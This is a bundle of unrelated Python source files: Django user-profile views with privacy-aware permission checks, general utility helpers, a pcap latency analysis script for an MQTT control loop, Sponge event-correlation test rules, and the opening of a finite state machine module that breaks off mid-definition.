from wafer.talks.models import ACCEPTED
from wafer.users.forms import UserForm, UserProfileForm
from wafer.users.serializers import UserSerializer
from wafer.users.models import UserProfile
from wafer.utils import PaginatedBuildableListView
log = logging.getLogger(__name__)
class UsersView(PaginatedBuildableListView):
    """Paginated user listing; restricted to accepted speakers when the attendee list is private."""
    template_name = 'wafer.users/users.html'
    model = get_user_model()
    paginate_by = 25
    build_prefix = 'users'

    def get_queryset(self, *args, **kwargs):
        queryset = super(UsersView, self).get_queryset(*args, **kwargs)
        if not settings.WAFER_PUBLIC_ATTENDEE_LIST:
            # Private attendee list: only show users with accepted talks.
            queryset = queryset.filter(talks__status=ACCEPTED).distinct()
        return queryset.order_by('first_name', 'last_name', 'username')
class Hide404Mixin(object):
    """Generic handling for user objects.

    When the attendee list is not public, every 404 is converted into a
    403 so requests cannot probe which usernames exist.
    """
    def get(self, *args, **kwargs):
        try:
            return super(Hide404Mixin, self).get(*args, **kwargs)
        except Http404:
            if settings.WAFER_PUBLIC_ATTENDEE_LIST:
                # Public attendee list: a genuine 404 is the right answer.
                raise
            # Hide whether the user exists at all.
            raise PermissionDenied()
class ProfileView(Hide404Mixin, BuildableDetailView):
    """Public profile page for a single user, looked up by username.

    When the attendee list is private, profiles of users without accepted
    talks raise PermissionDenied (get_object); Hide404Mixin maps 404s to
    403s in the same configuration.
    """
    template_name = 'wafer.users/profile.html'
    model = get_user_model()
    slug_field = 'username'
    slug_url_kwarg = 'username'
    # avoid a clash with the user object used by the menus
    context_object_name = 'profile_user'
    def get_url(self, obj):
        # django-bakery: URL under which the static page is built
        return reverse('wafer_user_profile', args=(obj.username,))
    def build_object(self, obj):
        """Override django-bakery to skip profiles that raise 404"""
        try:
            build_path = self.get_build_path(obj)
            # Build as an anonymous visitor so private data never leaks
            # into the static output.
            self.request = self.create_request(build_path)
            self.request.user = AnonymousUser()
            self.set_kwargs(obj)
            self.build_file(build_path, self.get_content())
        except Http404:
            # cleanup directory
            self.unbuild_object(obj)
    def get_object(self, *args, **kwargs):
        # Enforce the private-attendee-list policy on every fetch.
        object_ = super(ProfileView, self).get_object(*args, **kwargs)
        if not settings.WAFER_PUBLIC_ATTENDEE_LIST:
            if (not self.can_edit(object_) and
                    not object_.userprofile.accepted_talks().exists()):
                raise PermissionDenied()
        return object_
    def get_context_data(self, **kwargs):
        context = super(ProfileView, self).get_context_data(**kwargs)
        context['can_edit'] = self.can_edit(context['object'])
        return context
    def can_edit(self, user):
        # The user themselves, or anyone with the change_userprofile perm.
        is_self = user == self.request.user
        return is_self or self.request.user.has_perm(
            'users.change_userprofile')
# TODO: Combine these
class EditOneselfMixin(Hide404Mixin):
    """Extend the behaviour with edit permission checks.

    Only the user themselves or a holder of `users.change_userprofile`
    may fetch (and therefore edit) the object.
    """
    def get_object(self, *args, **kwargs):
        # Permission is verified on every object fetch (both GET and POST).
        object_ = super(EditOneselfMixin, self).get_object(*args, **kwargs)
        self.verify_edit_permission(object_)
        return object_
    def verify_edit_permission(self, object_):
        if hasattr(object_, 'user'):  # Accept User or UserProfile
            object_ = object_.user
        if object_ == self.request.user or self.request.user.has_perm(
                'users.change_userprofile'):
            return
        # Mirror Hide404Mixin: only hide the user's existence (404) when
        # the attendee list is public; otherwise a plain 403.
        if settings.WAFER_PUBLIC_ATTENDEE_LIST:
            raise Http404()
        else:
            raise PermissionDenied()
class EditUserView(EditOneselfMixin, UpdateView):
    """Edit the core User fields; permitted only to the user or an admin (EditOneselfMixin)."""
    model = get_user_model()
    form_class = UserForm
    template_name = 'wafer.users/edit_user.html'
    slug_field = 'username'
    slug_url_kwarg = 'username'
    # avoid a clash with the user object used by the menus
    context_object_name = 'profile_user'

    def get_success_url(self):
        # Return to the profile page after a successful save.
        return reverse('wafer_user_profile', args=(self.object.username,))
class EditProfileView(EditOneselfMixin, UpdateView):
    """Edit the UserProfile record; permitted only to the user or an admin (EditOneselfMixin)."""
    model = UserProfile
    form_class = UserProfileForm
    template_name = 'wafer.users/edit_profile.html'
    slug_field = 'user__username'
    slug_url_kwarg = 'username'
    # avoid a clash with the user object used by the menus
    context_object_name = 'profile_user'

    def get_success_url(self):
        # Return to the owning user's profile page after a successful save.
        return reverse('wafer_user_profile', args=(self.object.user.username,))
class UserViewSet(viewsets.ModelViewSet):
    """API endpoint for users (full CRUD via DRF ModelViewSet)."""
    queryset = get_user_model().objects.all()
    serializer_class = UserSerializer
    # We want some better permissions than the default here, but
    # IsAdminUser will do for now.
    permission_classes = (IsAdminUser, )
|
import sys
sys.path.append('../')
import bz2, os
import random, string
import importlib
import _pickle as pickle
from datetime import datetime, timedelta
# ~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<
# OS & list MANAGEMENT FUNCTIONS <~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<
# ~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<
def find(name, path):
    '''Walk *path* and return the full path of the first file named *name*, or None.'''
    for root, _dirs, files in os.walk(path):
        if name in files:
            return os.path.join(root, name)
    return None
def getFilepaths(directory):
    """
    Walk the tree rooted at *directory* (top-down) and return a list with
    the full path of every file found.
    """
    return [
        os.path.join(root, filename)
        for root, _dirs, files in os.walk(directory)
        for filename in files
    ]
def absoluteFilePaths(directory):
    '''Yield the absolute path of every file under *directory*.'''
    for dirpath, _, filenames in os.walk(directory):
        for name in filenames:
            yield os.path.abspath(os.path.join(dirpath, name))
def import_package_string(package_string):
    '''Import and return the module named by *package_string*
    (dotted form, e.g. "day_trader.models.LU01_A3"; no ".py" suffix).'''
    return importlib.import_module(package_string)
def genrs(length=10):
    '''Generate a random alphanumeric string of the given length (default 10).'''
    alphabet = string.ascii_letters + string.digits
    return ''.join(random.choices(alphabet, k=length))
def remove_values_from_list(the_list, val):
    '''Return a copy of the_list with every occurrence of val removed.'''
    return [item for item in the_list if item != val]
def chunks(l, n):
    '''Yield successive size-n slices of list l (the last one may be shorter).'''
    for start in range(0, len(l), n):
        yield l[start:start + n]
def sizeFirstBin(data, col, minimum_bin_size, vals=None):
    '''Greedily bin the values of *col* so each bin reaches minimum_bin_size rows.

    Values are assigned in order to the current bin until its accumulated
    row count reaches minimum_bin_size, then a new bin is started.  Note the
    check happens *before* adding, so bins can overshoot the minimum and the
    final bin may fall short of it.
    __________
    parameters
    - data : pd.DataFrame
    - col : the column to bin based on
    - minimum_bin_size : int. Each bin must have at least this size
    - vals : list. Will only bin the values in this list. The default is all
      the unique values of *col*
    '''
    values = sorted(data[col].unique()) if vals is None else vals
    counts = dict(data[col].value_counts())
    bins = {}
    current = 1
    total = 0
    for val in values:
        if total < minimum_bin_size:
            # current bin still under the minimum: keep filling it
            bins.setdefault(current, []).append(val)
            total += counts[val]
        else:
            # open a fresh bin starting with this value
            current += 1
            bins[current] = [val]
            total = counts[val]
    return bins
def nondups(items: list):
    '''Return True if list has no duplicate items (also prints both counts).'''
    unique = set(items)
    print('List length:', len(items))
    print('Unique items:', len(unique))
    return len(items) == len(unique)
# ~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<
# Storage & COMPRESSION FUNCTIONS <~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~
# ~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<
# Article on pickling and compressed pickling functions
# https://betterprogramming.pub/load-fast-load-big-with-compressed-pickles-5f311584507e
def full_pickle(title, data):
    '''Pickle *data* to the file "<title>.pickle".

    Uses a context manager so the file handle is closed even if pickling
    raises (the original opened the file without `with` and leaked the
    handle on error).
    '''
    with open(title + '.pickle', 'wb') as pikd:
        pickle.dump(data, pikd)
def loosen(file):
    '''Load and return the object pickled in *file*.

    Uses a context manager so the handle is closed even if unpickling
    raises (the original leaked it on error).
    '''
    with open(file, 'rb') as pikd:
        return pickle.load(pikd)
def compressed_pickle(title, data):
    '''
    Pickle an object and bzip2-compress it into "<title>.pbz2".
    __________
    parameters
    - title : file name to save under (the .pbz2 extension is appended automatically)
    - data : object you want to save
    '''
    destination = title + '.pbz2'
    with bz2.BZ2File(destination, 'w') as handle:
        pickle.dump(data, handle)
def decompress_pickle(filename):
    '''Load and return the object from a .pbz2 compressed pickle.

    *filename* must include the .pbz2 extension.  The original never
    closed the BZ2File; the context manager fixes that leak.
    '''
    with bz2.BZ2File(filename, 'rb') as handle:
        return pickle.load(handle)
# ~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<
# Time Management FUNCTIONS <~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~
# ~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<
# Time Stuff
def cuttomin(x):
    '''Format a timestamp to minute precision, dropping seconds and finer ("MM-DD HH:MM").'''
    return x.strftime('%m-%d %H:%M')
def cuttohrs(x):
    '''Format a timestamp to hour precision, dropping minutes and finer ("MM-DD HH").'''
    return x.strftime('%m-%d %H')
def cuttodays(x):
    '''Format a timestamp to date precision, dropping time of day ("YY-MM-DD").'''
    return x.strftime('%y-%m-%d')
def datetime_range(start, end, delta):
    '''Yield values from start (inclusive) to end (exclusive) in steps of delta.

    Works for datetimes with a timedelta step, or any types supporting
    `<` and `+`.'''
    cursor = start
    while cursor < end:
        yield cursor
        cursor = cursor + delta
def prev_weekday(adate):
    '''Return the most recent weekday (Mon-Fri) strictly before *adate*.'''
    adate -= timedelta(days=1)
    while adate.weekday() >= 5:  # 5, 6 = Saturday, Sunday
        adate -= timedelta(days=1)
    return adate
|
#!/usr/bin/env python
''' Access will always be in control values (maybe value?) '''
import pickle
from matplotlib import use
use('TkAgg')
from matplotlib import rcParams
rcParams['ps.useafm'] = True
rcParams['pdf.use14corefonts'] = True
from matplotlib.pyplot import gca, grid, subplots_adjust,figure, xlabel, ylabel, title, savefig, show, legend, subplot, boxplot, axes, hist, savefig, xlim, ylim, plot, hist2d, axis, close as figclose
from matplotlib.colors import LogNorm
from numpy import median, arange, zeros, searchsorted, genfromtxt, argsort, diff, sqrt, where, cos, sin, fmod, mean, array, pi, isnan, vstack, hstack
from sys import argv
from time import time as clock
from math import sin, cos, sqrt, asin, isnan, isinf, pi
import dpkt
import datetime
import socket
import cStringIO
import string
from re import search
from operator import itemgetter
from sys import exc_info
# Reference-trajectory parameters per axis: kernel shape, amplitude, frequency (Hz).
ykernel = 'butterfly2'
yamplitude = 2.0
yfrequency = 1.0 / 100.00
psikernel = 'butterfly1'
psiamplitude = 0 * pi / 180
psifrequency = 1.0 / 125.0
xkernel = 'butterfly1'
xamplitude = 2.0
xfrequency = 1.0 / 100.00
# Reference function -- gets the reference trajectory value at a time t
def ref(time, kernel, amplitude, frequency):
    """Evaluate the named reference kernel at *time*.

    :param time: time in seconds
    :param kernel: one of 'butterfly1', 'butterfly2', 'square', 'sin', 'cos'
    :param amplitude: peak amplitude of the waveform
    :param frequency: frequency in Hz
    :raises ValueError: for an unknown kernel name (the original fell
        through all branches and hit a NameError on the unbound `val`).
    """
    if kernel == 'butterfly1':
        return amplitude * cos(2 * pi * time * frequency) * sin(4 * pi * time * frequency)
    if kernel == 'butterfly2':
        return amplitude * cos(2 * pi * time * frequency) * sin(2 * pi * time * frequency)
    if kernel == 'square':
        # Square wave: sign of a sine at the same frequency
        return -amplitude if sin(frequency * 2 * pi * time) < 0 else amplitude
    if kernel == 'sin':
        return amplitude * sin(frequency * 2 * pi * time)
    if kernel == 'cos':
        return amplitude * cos(frequency * 2 * pi * time)
    raise ValueError('unknown reference kernel: %s' % kernel)
def process(filename):
    """Load a whitespace-delimited log file (skipping one header and one
    footer line) and return its rows sorted by column 5.

    Invalid lines are skipped rather than raising.  (Historical row-range
    and NaN filtering was already disabled in the original.)
    """
    raw = genfromtxt(filename, skip_header=1, skip_footer=1, invalid_raise=False)
    order = argsort(raw[:, 5])
    return raw[order, :]
broker_ip = "172.16.31.10"  # MQTT broker address (testbed-specific; appears unused in this module)
host_ip = "192.168.0.6"  # local host address on the capture network (appears unused here)
def ip_to_str(address):
    """Convert a packed (binary) IPv4 address to its printable dotted-quad string.

    Args:
        address: 4-byte packed IPv4 address (e.g. from a pcap IP header)
    Returns:
        printable IP address string
    """
    return socket.inet_ntop(socket.AF_INET, address)
# def isclose(a, b, allowed_error = .001):
# return abs(a - b) <= allowed_error
def remove_duplicates(seq):
    """Drop entries whose timestamp (entry[0], rounded to 2 decimals) was
    already seen, keeping the first occurrence, then sort by raw timestamp."""
    seen = set()
    kept = []
    for entry in seq:
        stamp = round(entry[0], 2)
        if stamp not in seen:
            seen.add(stamp)
            kept.append(entry)
    kept.sort(key=lambda e: e[0])
    return kept
def analyzetcp(capturefile, remote='172.16.58.3'):
    ## custom code to recognize data to and from 172.16.58.3
    '''Parse a pcap capture and pair control requests with state reports.

    (Python 2 code: uses print statements.)  Packets from *remote*
    carrying "value" with a "&t="/"&time=" field are collected as control
    messages; bracketed state vectors are collected as state messages.
    After de-duplication both lists are merged on their embedded
    timestamp; unmatched entries get an infinite delta.

    Returns a list of [delta, embedded_time, state_capture_offset,
    control_capture_offset] entries.
    '''
    f = open(capturefile)
    pcap = dpkt.pcap.Reader(f)
    state_list = []
    control_list = []
    times = []
    t0 = None
    for ts, buf in pcap:
        eth = dpkt.ethernet.Ethernet(buf)
        # t0 = capture time of the first packet; all offsets are relative to it
        if t0 is None: t0 = datetime.datetime.utcfromtimestamp(ts) ;
        # IP object includes information such as IP Address
        ip = eth.data;
        if type(ip.data) is dpkt.tcp.TCP:
            #print ts, len(buf), ip.data.data, socket.inet_ntoa(ip.src), socket.inet_ntoa(ip.dst)
            try:
                # This includes TCP header information
                tcp = ip.data;
                # if "]" in tcp.data and "value" not in tcp.data and " " in tcp.data:
                if socket.inet_ntoa(ip.src) in remote and "value" in tcp.data and "&t=" in tcp.data:
                    # control request, "&t=<time>" variant
                    time = tcp.data.rsplit("t=")[1].rsplit("&")[0]
                    control_list.append([float(time), datetime.datetime.utcfromtimestamp(ts) - t0])
                elif socket.inet_ntoa(ip.src) in remote and "value" in tcp.data and "&time=" in tcp.data:
                    # control request, "&time=<time>" variant
                    time = tcp.data.rsplit("time=")[1].rsplit("&")[0];
                    control_list.append([float(time), datetime.datetime.utcfromtimestamp(ts) - t0])
                elif socket.inet_ntoa(ip.dst) in remote and len(tcp.data)> 20 and ']' in tcp.data and "value" not in tcp.data :
                    # state report: two bracketed 5-element vectors in one segment
                    m = search('\[(.+?) (.+?) (.+?) (.+?) (.+?)\](.+?)\[(.+?) (.+?) (.+?) (.+?) (.+?)\]', tcp.data)
                    if m:
                        if len(m.groups()) == 11:
                            # last element of each vector is its timestamp
                            time = m.group(5).split()[-1]
                            state_list.append([float(time), datetime.datetime.utcfromtimestamp(ts) - t0])
                            time = m.group(11).split()[-1]
                            state_list.append([float(time), datetime.datetime.utcfromtimestamp(ts) - t0])
                        else:
                            print "should be long", tcp.data
                else:
                    # any other TCP payload: try the single-vector state form
                    m = search('\[(.+?) (.+?) (.+?) (.+?) (.+?)\]', tcp.data)
                    if m:
                        time = m.groups()[-1].split()[-1];
                        state_list.append([float(time), datetime.datetime.utcfromtimestamp(ts) - t0])
                    #else:
                    #    print "should be short", tcp.data
                #else:
                #    print "don't know", tcp.data, socket.inet_ntoa(ip.dst)
            except :
                print tcp.data, "error!", exc_info(),"\n";
        else: #packet is not a TCP packet
            pass
    '''
    figure(101)
    mydat=array([ (i[1]-control_list[0][1]).total_seconds() for i in control_list])
    latency = mydat- arange(0,round(len(mydat)*.2,2),.2)
    hist(latency - min(latency), 100, log=True);xlim([-.1,.6]);ylim([1,37000]);grid("on",which="both");
    xlabel('Relative latency in control request (s)')
    savefig(capturefile.replace("/","_")[3:-3]+"eps" , format='eps')
    figclose(101)
    '''
    state_list = remove_duplicates(state_list)
    control_list = remove_duplicates(control_list)
    # Merge the two sorted lists on their embedded timestamps; a missing
    # partner yields an infinite RTT entry.
    state_count, control_count = 0,0
    while state_count < len(state_list) and control_count < len(control_list):
        #print state_list[state_count][0], control_list[control_count][0]
        if state_list[state_count][0] == control_list[control_count][0]:
            delta = state_list[state_count][1] - control_list[control_count][1]
            times.append([delta,state_list[state_count][0],state_list[state_count][1], control_list[control_count][1]])
            state_count+=1
            control_count+=1
        elif state_list[state_count][0] > control_list[control_count][0]:
            times.append([float("inf"),state_list[state_count][0],state_list[state_count][1], control_list[control_count][1]])
            control_count+=1
        elif state_list[state_count][0] < control_list[control_count][0]:
            times.append([float("inf"),state_list[state_count][0],state_list[state_count][1], control_list[control_count][1]])
            state_count+=1
    f.close()
    return times;
def errors(data):
    """Compute per-100-second-window mean absolute tracking error.

    The measured trajectory is first aligned to the reference by
    cross-correlating the actual (col 2) and target (col 7) signals over
    the first 2000 non-NaN rows.

    Fixes vs. the original:
    - `e_data1` was referenced below but its definition was commented out,
      guaranteeing a NameError; the definition (controller-side timestamp,
      column 14) is restored per the original's own comment.
    - `interp1d` and `correlate` were never imported at module level; they
      are imported locally here.  mode='full' is used so the lag axis
      matches the original's `arange(1-N, N)` indexing.

    Returns (errors, counts): 16 window errors and the sample count per window.
    """
    from numpy import correlate
    from scipy.interpolate import interp1d
    number = 16
    # --- time alignment via cross-correlation ---
    q = array([item for item in data[0:2000, :] if not isnan(item[1])])
    xnew = arange(q[0, 0] + .01, q[-1, 0], .01)
    ynew1 = interp1d(q[:, 0], q[:, 2], kind='linear', axis=-1, copy=True, bounds_error=True)(xnew)
    ynew2 = interp1d(q[:, 0], q[:, 7], kind='linear', axis=-1, copy=True, bounds_error=True)(xnew)
    xcorr = correlate(ynew1, ynew2, mode='full')
    datadt = arange(1 - xnew.shape[0], xnew.shape[0])[xcorr.argmax()]  # lag in 10 ms samples
    # --- per-sample errors against the reference, on both time bases ---
    e_data0 = array([[item[0] - datadt * .01,
                      item[1] - ref(item[0] - datadt * .01, xkernel, xamplitude, xfrequency),
                      item[2] - ref(item[0] - datadt * .01, ykernel, yamplitude, yfrequency)]
                     for item in data if not isnan(item[1])])
    # Same errors using the controller-side timestamp (column 14); restored
    # from the commented-out original since it is used below.
    e_data1 = array([[item[14] - datadt * .01,
                      item[1] - ref(item[14] - datadt * .01, xkernel, xamplitude, xfrequency),
                      item[2] - ref(item[14] - datadt * .01, ykernel, yamplitude, yfrequency)]
                     for item in data if not isnan(item[1])])
    errors_ = [None] * number
    counts = [None] * number
    for count in range(1, number + 1):
        # Index range of this 100 s window
        d0max = searchsorted(e_data0[:, 0], [.1 + 100 * count, .1 + 100 * count + 100], side='left')
        # The controller can get delayed, so the time may be off by a cycle:
        # take the minimum error over both time bases (columns 0 and 14).
        errors_[count - 1] = min(
            sum(abs(e_data0[d0max[0]:d0max[1], 1])) / diff(d0max) + sum(abs(e_data0[d0max[0]:d0max[1], 2])) / diff(d0max),
            sum(abs(e_data1[d0max[0]:d0max[1], 1])) / diff(d0max) + sum(abs(e_data1[d0max[0]:d0max[1], 2])) / diff(d0max))
        counts[count - 1] = d0max[1] - d0max[0]
    return errors_, counts
if __name__ == "__main__":
    # Usage: script.py <capture-directory>
    path = argv[1]
    # Application-layer log and transport-layer capture for controller 1
    controller1_l5=process(path+"/mqtt_bar_control_action__1__plant_state__1.txt");
    controller1_l4=analyzetcp(path+'/Controller.pcap','10.0.0.3');
    # Histogram of matched (finite) transport-layer round-trip times
    hist([i[0].total_seconds() for i in controller1_l4 if type(i[0]) is not float],100);
    grid("on",which="both");#xlim([0,.8]);ylim([0,1e5])
    title("Histogram of the Transport Layer RTT n="+str(len(controller1_l4)))
    # Actual vs target trajectories per axis from the application log
    figure();plot(controller1_l5[:,0],controller1_l5[:,1]);plot(controller1_l5[:,0],controller1_l5[:,6]);title("x-axis");legend(["actual","target"])
    figure();plot(controller1_l5[:,0],controller1_l5[:,2]);plot(controller1_l5[:,0],controller1_l5[:,7]);title("y-axis");legend(["actual","target"])
    show()
|
"""
Sponge Knowledge Base
Using rules - immediate, duration
"""
from org.openksavi.sponge.examples.util import CorrelationEventsLog
from org.openksavi.sponge.core.event import EventId
def onInit():
    """Sponge init hook: set the shared rule duration and the assertion log."""
    global defaultDuration, correlationEventsLog
    defaultDuration = 2  # seconds; window applied to every rule below
    # Variables for assertions only
    correlationEventsLog = CorrelationEventsLog()
    sponge.setVariable("correlationEventsLog", correlationEventsLog)
def runRule(rule):
    """Log the rule's matched event sequence and record it for test assertions."""
    rule.logger.debug("Sequence: {}", SpongeUtils.getAbbreviatedEventSequenceString(rule))
    global correlationEventsLog
    correlationEventsLog.addEvents(rule.meta.name, rule)
# Naming F(irst), L(ast), A(ll), N(one)
# F(irst)F(irst)F(irst)
class RuleFFF(Rule):
    """e1 :first, e2 :first, e3 :first, within the shared duration window."""
    def onConfigure(self):
        self.withEvents(["e1", "e2", "e3 :first"])
        global defaultDuration
        self.withDuration(Duration.ofSeconds(defaultDuration))
    def onRun(self, event):
        runRule(self)
# F(irst)F(irst)L(ast)
class RuleFFL(Rule):
    """e1 :first, e2 :first, e3 :last, within the shared duration window."""
    def onConfigure(self):
        self.withEvents(["e1", "e2", "e3 :last"])
        global defaultDuration
        self.withDuration(Duration.ofSeconds(defaultDuration))
    def onRun(self, event):
        runRule(self)
# F(irst)F(irst)A(ll)
class RuleFFA(Rule):
    """e1 :first, e2 :first, e3 :all, within the shared duration window."""
    def onConfigure(self):
        self.withEvents(["e1", "e2", "e3 :all"])
        global defaultDuration
        self.withDuration(Duration.ofSeconds(defaultDuration))
    def onRun(self, event):
        runRule(self)
# F(irst)F(irst)N(one)
class RuleFFN(Rule):
    """e1 :first, e2 :first, and no e4 (:none) within the shared duration window."""
    def onConfigure(self):
        self.withEvents(["e1", "e2", "e4 :none"])
        global defaultDuration
        self.withDuration(Duration.ofSeconds(defaultDuration))
    def onRun(self, event):
        runRule(self)
# F(irst)L(ast)F(irst)
class RuleFLF(Rule):
    """e1 :first, e2 :last, e3 :first, within the shared duration window."""
    def onConfigure(self):
        self.withEvents(["e1", "e2 :last", "e3 :first"])
        global defaultDuration
        self.withDuration(Duration.ofSeconds(defaultDuration))
    def onRun(self, event):
        runRule(self)
# F(irst)L(ast)L(ast)
class RuleFLL(Rule):
    """e1 :first, e2 :last, e3 :last, within the shared duration window."""
    def onConfigure(self):
        self.withEvents(["e1", "e2 :last", "e3 :last"])
        global defaultDuration
        self.withDuration(Duration.ofSeconds(defaultDuration))
    def onRun(self, event):
        runRule(self)
# F(irst)L(ast)A(ll)
class RuleFLA(Rule):
    """e1 :first, e2 :last, e3 :all, within the shared duration window."""
    def onConfigure(self):
        self.withEvents(["e1", "e2 :last", "e3 :all"])
        global defaultDuration
        self.withDuration(Duration.ofSeconds(defaultDuration))
    def onRun(self, event):
        runRule(self)
# F(irst)L(ast)N(one)
class RuleFLN(Rule):
    """e1 :first, e2 :last, and no e4 (:none) within the shared duration window."""
    def onConfigure(self):
        self.withEvents(["e1", "e2 :last", "e4 :none"])
        global defaultDuration
        self.withDuration(Duration.ofSeconds(defaultDuration))
    def onRun(self, event):
        runRule(self)
# F(irst)A(ll)F(irst)
class RuleFAF(Rule):
    """e1 :first, e2 :all, e3 :first, within the shared duration window."""
    def onConfigure(self):
        self.withEvents(["e1", "e2 :all", "e3 :first"])
        global defaultDuration
        self.withDuration(Duration.ofSeconds(defaultDuration))
    def onRun(self, event):
        runRule(self)
# F(irst)A(ll)L(ast)
class RuleFAL(Rule):
    """e1 :first, e2 :all, e3 :last, within the shared duration window."""
    def onConfigure(self):
        self.withEvents(["e1", "e2 :all", "e3 :last"])
        global defaultDuration
        self.withDuration(Duration.ofSeconds(defaultDuration))
    def onRun(self, event):
        runRule(self)
# F(irst)A(ll)A(ll)
class RuleFAA(Rule):
    """e1 :first, e2 :all, e3 :all, within the shared duration window."""
    def onConfigure(self):
        self.withEvents(["e1", "e2 :all", "e3 :all"])
        global defaultDuration
        self.withDuration(Duration.ofSeconds(defaultDuration))
    def onRun(self, event):
        runRule(self)
# F(irst)A(ll)N(one)
class RuleFAN(Rule):
    """e1 :first, e2 :all, and no e5 (:none) within the shared duration window."""
    def onConfigure(self):
        self.withEvents(["e1", "e2 :all", "e5 :none"])
        global defaultDuration
        self.withDuration(Duration.ofSeconds(defaultDuration))
    def onRun(self, event):
        runRule(self)
# F(irst)N(one)F(irst)
class RuleFNF(Rule):
    """e1 :first, no e5 (:none), e3 (default mode), within the shared duration window."""
    def onConfigure(self):
        self.withEvents(["e1", "e5 :none", "e3"])
        global defaultDuration
        self.withDuration(Duration.ofSeconds(defaultDuration))
    def onRun(self, event):
        runRule(self)
# F(irst)N(one)L(ast)
class RuleFNL(Rule):
    """e1 :first, no e5 (:none), e3 :last, within the shared duration window."""
    def onConfigure(self):
        self.withEvents(["e1", "e5 :none", "e3 :last"])
        global defaultDuration
        self.withDuration(Duration.ofSeconds(defaultDuration))
    def onRun(self, event):
        runRule(self)
# F(irst)N(one)A(ll)
class RuleFNA(Rule):
    """e1 :first, no e5 (:none), e3 :all, within the shared duration window."""
    def onConfigure(self):
        self.withEvents(["e1", "e5 :none", "e3 :all"])
        global defaultDuration
        self.withDuration(Duration.ofSeconds(defaultDuration))
    def onRun(self, event):
        runRule(self)
class RuleFNFReject(Rule):
    """Like RuleFNF but with ':none' on e2, which does occur -- expected never to fire."""
    def onConfigure(self):
        self.withEvents(["e1", "e2 :none", "e3"])
        global defaultDuration
        self.withDuration(Duration.ofSeconds(defaultDuration))
    def onRun(self, event):
        runRule(self)
def onStartup():
    """Send the labelled test event sequence that drives all the rules above."""
    sponge.event("e1").set("label", "1").send()
    sponge.event("e2").set("label", "2").send()
    sponge.event("e2").set("label", "3").send()
    sponge.event("e3").set("label", "4").send()
    sponge.event("e2").set("label", "5").send()
    sponge.event("e3").set("label", "6").send()
    sponge.event("e3").set("label", "7").send()
|
# -*- coding: utf-8 -*-
#
# Finite State Machine
#
# Written in 2021 by Moky <<EMAIL>>
#
# ==============================================================================
# MIT License
#
# Copyright (c) 2021 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ==============================================================================
import weakref
from abc import ABC
from typing import List, Optional, Dict
from .machine import S, C, U, T
from .machine import Transition, State, Machine, Status, Delegate
class BaseTransition(Transition[C], ABC):
    """ Transition with the name of target state """
    def __init__(self, target: str):
        super().__init__()
        # Only the *name* is stored; BaseMachine.target_state resolves it.
        self.__target = target
    @property
    def target(self) -> str:
        """ target state name """
        return self.__target
class BaseState(State[C, T], ABC):
    """State holding an ordered list of outgoing transitions."""
    def __init__(self):
        super().__init__()
        self.__transitions: List[T] = []
    def add_transition(self, transition: T):
        # Reject duplicates: each transition may be registered once.
        assert transition not in self.__transitions, 'transition exists'
        self.__transitions.append(transition)
    # Override
    def evaluate(self, ctx: C) -> Optional[T]:
        """Return the first transition whose condition holds for ctx, or None."""
        return next((t for t in self.__transitions if t.evaluate(ctx)), None)
class BaseMachine(Machine[C, T, S]):
    """Finite state machine with named states, a weakly-referenced delegate
    and a start/stop/pause/resume lifecycle.

    Fix vs. original: ``context`` raised ``NotImplemented`` (a constant,
    not an exception class), which surfaces as a confusing ``TypeError``
    in Python 3; it now raises ``NotImplementedError``.
    """
    def __init__(self, default: str):
        super().__init__()
        self.__default = default  # name of the initial state
        self.__current: Optional[S] = None
        self.__states: Dict[str, S] = {}  # name(str) => State
        # weak reference so the delegate does not create a reference cycle
        self.__delegate: Optional[weakref.ReferenceType] = None
        self.__status: Status = Status.STOPPED
    @property
    def delegate(self) -> Delegate[C, T, S]:
        """Lifecycle-event callback target; None if unset or already collected."""
        ref = self.__delegate
        if ref is not None:
            return ref()
    @delegate.setter
    def delegate(self, handler: Delegate[C, T, S]):
        if handler is None:
            self.__delegate = None
        else:
            self.__delegate = weakref.ref(handler)
    @property
    def context(self) -> C:
        # Subclasses must return the context object passed to states/delegate.
        raise NotImplementedError
    #
    #   States
    #
    def add_state(self, name: str, state: S):
        self.__states[name] = state
    def get_state(self, name: str) -> S:
        return self.__states.get(name)
    @property  # Override
    def default_state(self) -> S:
